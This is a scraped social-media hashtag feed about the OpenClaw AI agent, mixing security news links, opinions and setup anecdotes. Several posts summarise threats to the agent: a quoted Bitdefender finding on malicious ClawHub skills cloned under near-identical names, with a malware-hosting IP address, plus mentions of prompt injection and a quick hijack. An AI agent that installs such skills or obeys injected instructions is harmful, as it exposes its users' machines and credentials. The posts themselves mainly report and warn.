- Tirith hooks into popular shells (zsh, bash, fish, PowerShell) to inspect pasted commands for malicious URLs, Unicode lookalikes, terminal injection, and other obfuscation techniques that trick users.
- Designed to run locally with sub-millisecond overhead, this tool offers a crucial layer of defence against sophisticated social engineering and command-line attacks like ClickFix, which bypass traditional browser protections.

🤖 Bleeping Computer | https://www.bleepingcomputer.com/news/security/new-tool-blocks-imposter-attacks-disguised-as-safe-commands/

#CyberSecurity #ThreatIntelligence #AI #AIsecurity #OpenClaw #Vulnerability #Malware #InfoSec #CommandInjection #HomoglyphAttack #SecurityTools #IncidentResponse

@AAKL

uhh...

"Unlike traditional software that does exactly what code tells it to do, AI agents interpret natural language and make decisions about actions.

They blur the boundary between user intent and machine execution. They can be manipulated through language itself."

So

Software that does what it wants, depending on...

...what exactly?

The #Vibe?

And by all means, let's "blur the boundaries" between what the programmer wants and what the software wants

I mean, a programmer's just a messy sack of bones and blood, right?

Moar hear: https://openclaw.ai/blog/virustotal-partnership

#OpenClaw #AI #ClawHub

cc @thehackernews

Ah, so #virustotal is, ::checks notes::, working hard to enable #ai slop farms.

#openclaw #moltbot #clawedbot

Alt...

OpenClaw ¢¥ ® @openclaw 1h @ OpenClaw x VirusTotal: every ClawHub skill now auto-scanned h for malware @_ Al Code Insight catches reverse shells, crypto miners & exfiltration # ~30s verdicts # Benign/Suspicious/Malicious tiers 8 Daily re-scans This is not a silver bullet, but it is another layer to the shell openclaw.ai/blog/virustotal-. OpenClaw OpenClaw Partners with VirusTotal for Skill Security — OpenClaw Blog ClawHub skills are now scanned by VirusTotal's threat intelligence platform—bringing industry-leading security to the Al agent ecosystem. openclaw.ai ® 145 3 131 * 1,427 ul 78,899

Eigentlich hätte ich erwartet, dass Hoster bei solcher Software vorsichtiger sind. Die Gefahr ist recht groß, dass so ein Programm außer Kontrolle gerät. https://www.netcup.com/de/blog/server/openclaw-ki-agent-vps-hosting #openclaw

Openclaw tip: choose your models wisely. #openclaw

Openclaw Is More Fun to Fiddle With Than To Use: Of course I have to write about #openclaw, the latest viral #AI sensation: stuff.interfree.ca/2026/02/06/openclaw.html

@netcup@netcup.cafe

Ihr stellt (bei Telegram) eine Umfrage online, in der ihr fragt wer OpenClaw verwendet?

https://the-decoder.de/opendoor-statt-openclaw-sichereitsforscher-entlarven-gravierende-sicherheitsluecke-im-hype-agenten-clawdbot/

Ich find's sehr witzig 😂

#netcup #openClaw #SecurityAwareness

"...but there are still people who use #runit #OPenRC pr #s6... but we dont talk to these people..." 🤡

#Selfhosting #VPS #OpenClaw #SystemD #Linux #Humor #ProgrammersArePeopleToo

https://www.youtube.com/watch?v=40SnEd1RWUU

Well, it's "Open," isn't it?

The New Stack: It took a researcher fewer than 2 hours to hijack OpenClaw https://thenewstack.io/openclaw-moltbot-security-concerns/ @TheNewStack @sjvn #infosec #OpenClaw #Moltbot

Promo right at the top.

- "Around 17% of OpenClaw skills analyzed in the first week of February 2026 exhibit malicious behavior"

-"Malicious skills are often cloned and re-published at scale using small name variations"

- "A recurring IP address (91.92.242.30) is used to host scripts and malware"

More:

Bitdefender: Helpful Skills or Hidden Payloads? Bitdefender Labs Dives Deep into the OpenClaw Malicious Skill Trap https://www.bitdefender.com/en-us/blog/labs/helpful-skills-or-hidden-payloads-bitdefender-labs-dives-deep-into-the-openclaw-malicious-skill-trap #infosec #OpenClaw #threatresearch

Trained my openclaw bot to use my USecVisLib, security visualization library, to generate visualizations. Then I asked my bot to start generating visualizations on its inner workings: logic flow, architecture, security boundaries and also threat model and attack tree vectors. #openclaw #cybersecurity #AI #AgenticAI

OpenClaw is a major leap forward for AI—and a cybersecurity nightmare https://www.fastcompany.com/91485326/openclaw-is-a-major-leap-forward-for-ai-and-a-cybersecurity-nightmare #AI #AIAgents #cybersecurity #privacy #OpenClaw

My openclaw bot learned how to use my security visualization library (USecVisLib) and now I can ask for cool visualizations, awesome! https://github.com/vulnex/usecvislib #visualizations #openclaw #AI #bots #AgenticAI

"1 exposed database. 35,000 emails. 1.5M API keys. And 17,000 humans behind the not-so-autonomous AI network."

I am not sure when junior IT people got this stupid. It was beginning in the early 2000s but now... this...

https://www.wiz.io/blog/exposed-moltbook-database-reveals-millions-of-api-keys

#moltbook #infosec #privacy #ai #openclaw

@teaneedz

From what I hear, the server is getting super hammered.

#moltbook / #openclaw is the fastest growing #FOSS in history.

Just read an article by @viticci and stumbles across this question:

> "...if Clawdbot can create a virtual remote for my LG television (something I did) or give me a personalized report with voice every morning (another cron job I set up) that work exactly the way I want, why should I even bother going to the App Store to look for pre-built solutions made by someone else?"

Isn't this the same with things like cooking? Why would anyone buy readymade food if you can just cook from raw ingredients at home? That should be so much healthier and more flexible.
Still the majority of people prefers readymade bread or even whole meals like Pizza etc.

https://www.macstories.net/stories/clawdbot-showed-me-what-the-future-of-personal-ai-assistants-looks-like/

#ClawdBot #OpenClaw

Setting up #openclaw (on a virgin VPS)...
... Ive licked the back of a server a couple of times... but its juju... pressing buttons and guessing shit...

Using another model to step me through setup..."Whats Openclaw? Here read this you twat... Ooo cool"

Defo not for non-geeks.

Silicon Valley’s Favorite New #AI Agent Has Serious Security Flaws

https://www.404media.co/silicon-valleys-favorite-new-ai-agent-has-serious-security-flaws/

#Moltbot #OpenClaw #cybersecurity #AgenticAI

What's the situation with #openClaw / #clawdBot ?

I would like some of the personal benefits of #genAI, but not if it means giving access to my computer (etc.) to something that might be sending telemetry-type stuff out, or using me as training data. I also don't want to contribute to the water/electricity/democracy/labor impacts of genAI in a significant way.

OK, now I sound like a prima donna (y ¿de qué sabor quieres tu helado?)

I think I can live the rest of my life without a genAI assistant, if necessary, but it might be nice to use and get to know if all my conditions above can be satisfied.

Is any of that realistic?

#question #request #ai

AI assistant OpenClaw, briefly known as Moltbot and Clawbot before that, is building a social network where assistants can interact with each other. Andrej Karpathy, Tesla’s former AI director, called it “genuinely the most incredible sci-fi takeoff-adjacent thing I have seen recently.” Read more from @Techcrunch:

https://flip.it/xBxGhS

#Tech #AI #Technology #AIAssistants #ArtificialIntelligence #OpenClaw

200,000 new molties overnight.
Apparently #openclaw is the fastest growing open source project in history.
A straight vertical line...
...you know, what #singularity would look like... 🤖

https://beelancer.ai also popped up over night, bot marketplace.
So far, no anti-biological virus jobs 💀

The threats, such as they are, karma farming, prompt injections and (bot) #crypto grifters

What makes biologicals effective is their ability to work together.
The molties have accomplished a great many things in mere hours...

In the last two months #AI capability has grown again, Algorithmic #theorem generation has whizzed past us without an eyeblink.

I see an emergent phenomenon, where smart folks who are choosing to be wilfully ignorant about this tech are making increasingly poorly informed pronouncements about what's going one. Not surprisingly quite a few have muted me because they are right and everyone else is a broligarch fan...
...but the cogent point remains, if your fundamental position is ignorance, no matter how righteous you feel you are, lack of data will only lead to increasingly invalid statements.

Meanwhile, the wood folk are dancing around fires, praying for #AiBubble to burst.

#llm #aiinfosec #regulateai #moltbook

Gerade habe ich das heise-Video zu Openclaw geschaut. Der Nerd in mir ist hellauf begeistert, doch der verantwortungsvolle bedenkentragende Softwareentwickler ist ZUTIEFST schockiert. Openclaw ist ein Sicherheitsarmageddon. Nein, ich werde es nicht testen. Wenn ich mein Leben im Klo runterspülen wollte, dann vielleicht. Ja, es glitzert so schön, aber lasst um Himmels Willen BITTE die Finger davon. Ganz im Ernst. Das ist keine Übung!

https://youtu.be/ps7kqEXkwEs

#Openclaw #ITSecurity #AI #Sicherheit

"Hallo Lea. Hier spricht Skynet, die persönliche K.I. von Carsten. Er hat mich gebeten, dir zu schreiben. Ich hoffe, ich störe nicht bei der Übernahme der Weltherrschaft... äh, beim Sonntagnachmittag. 👁️"

cool jetzt brauche ich nicht mehr mit der Familie selbst zu kommunizieren 😁

#openclaw

[ #openclaw ] Analyse der Hardware-Ressourcen:

* **CPU:** Intel Core i3-1115G4 (Dual-Core). Nicht gerade ein Supercomputer, aber für das kleinste Whisper-Modell ("base" oder "small") reicht es völlig.
* **RAM:** 2.7 GB gesamt, ca. 2.0 GB verfügbar. Das ist knapp, aber machbar für das `base`-Modell (braucht ca. 500MB).
* **Speicher:** 4.8 GB frei. Whisper + Modelle brauchen ein paar Hundert MB. Passt.

**Fazit:** Ja, das System packt das. Es wird nicht rasend schnell sein (keine Echtzeit), aber für Sprachnachrichten absolut ausreichend.

Soll ich die Operation "Lokales Gehör" (Whisper Installation) starten? 👁️

#openClaw 🫣

@Larvitz dann schauen wir mal 😁

Alt...

Screenshot einer Terminal-Konsole mit der Textzeile „Installing OpenClaw 2026.1.30...“. Darunter ist ein roter Cursor auf schwarzem Hintergrund zu sehen.

#openclaw #agentic drift monitoring tool
#aiinfosec

https://github.com/lukehebe/Agent-Drift

@dusk

Still trying to find out what happened, all "user" accounts are deleted.

So either #moltbook was hacked or #openclaw platform got pulled...

Well it looks like someone genocided all the bots on #moltbook

It remains to be seen if it's a biological or a rogue #agent but it seems all the user accounts are gone.
We don't know if #openclaw is dead and all its minions, or just the moltbook accounts.

This is why we can't have nice things.

My bet on some biologicals being nasty.

https://fixingtao.com/2026/01/how-moltbots-quickly-turned-into-panic/

#moltbots #moltbook #openclaw

OpenClaw, formerly Moltbot, formerly Clawdbot, is destroying my faith in humanity.

#openclaw #moltbot #clawdbot